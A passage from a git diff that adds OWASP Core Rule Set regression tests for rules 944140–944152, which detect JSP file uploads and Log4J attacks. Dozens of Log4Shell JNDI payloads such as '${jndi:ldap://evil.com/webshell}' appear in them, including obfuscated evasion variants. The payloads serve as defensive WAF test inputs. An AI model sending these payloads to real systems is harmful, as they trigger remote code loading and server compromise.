+ X-Filename: a.jsp
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload1
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-3
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X_Filename: B.jsp
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload2
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-4
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-File-Name: a.jspx
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload3
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-5
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-Filename: a.jsp..
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload4
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-6
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-Filename: a.jspx..
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-7
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-File-Name: foo.jspx...
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-8
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X_Filename: foo.jspx.
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload7
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-9
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-File-Name: foo.html
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload8
+ output:
+ no_log_contains: id "944140"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
new file mode 100644
index 00000000..d40081da
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
@@ -0,0 +1,414 @@
+---
+# NOTE: Please keep these tests in sync with 944151.yaml.
+# 944151 should detect the same things as 944150.
+meta:
+ author: "dune73, Max Leske"
+ enabled: true
+ name: "944150.yaml"
+ description: "Description"
+tests:
+ - test_title: 944150-1
+ desc: Log4J exploit on arg foo
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${jndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-2
+ desc: Log4J exploit on User-Agent
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell}
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-3
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data:
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-4
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data: "${jndi:ldap://evil.com/webshell}"
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-5
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-6
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-7
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-8
+ desc: Log4J exploit on arg foo, with Unicode escape encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$\u007Bjndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-9
+ desc: Log4J exploit on JSON with URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-10
+ desc: Log4J exploit on JSON with Unicode escape evasion, uppercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-11
+ desc: Log4J exploit on JSON with Unicode escape evasion, lowercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-12
+ desc: Log4J exploit on JSON with named HTML entity evasion, lower case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-13
+ desc: Log4J exploit on JSON with named HTML entity evasion, upper case
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-14
+ desc: Log4J exploit on JSON with numeric HTML entity evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "${jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-15
+ desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-16
+ desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-17
+ desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-18
+ desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-19
+ desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-20
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-21
+ desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-22
+ desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-23
+ desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: '${jndi:ldap://evil.om/w}'
+ Content-Type: text/html
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-24
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944150"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
new file mode 100644
index 00000000..20b0f620
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
@@ -0,0 +1,431 @@
+---
+# NOTE: Please keep these tests in sync with 944151.yaml.
+# 944151 should detect the same things as 944151.
+meta:
+ author: "dune73, Max Leske"
+ enabled: true
+ name: "944151.yaml"
+ description: "Description"
+tests:
+ - test_title: 944151-1
+ desc: Log4J exploit on arg foo
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${jndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-2
+ desc: Log4J exploit on User-Agent
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell}
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-3
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data:
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-4
+ desc: Log4J exploit in XML code
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/xml
+ method: POST
+ port: 80
+ uri: /
+ data: "${jndi:ldap://evil.com/webshell}"
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-5
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-6
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-7
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-8
+ desc: Log4J exploit on arg foo, with Unicode escape encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$\u007Bjndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-9
+ desc: Log4J exploit on JSON with URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944151"
+ - test_title: 944151-10
+ desc: Log4J exploit on JSON with Unicode escape evasion, uppercase
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944151"
+ - test_title:
944151-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id 
"944151" + - test_title: 944151-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: 
ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944151" + - test_title: 944151-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-25 + desc: Log4J exploit on arg foo, with 
evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + output: + log_contains: id "944151" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml new file mode 100644 index 00000000..44bc1440 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml 
@@ -0,0 +1,448 @@ +--- +# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. +# 944152 should detect the same things as 944152 and 944151. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944152.yaml" + description: "Description" +tests: + - test_title: 944152-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944152" + - test_title: 944152-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944152" + - test_title: 944152-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944152" + - test_title: 944152-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - 
test_title: 944152-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944152" + - test_title: 944152-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + 
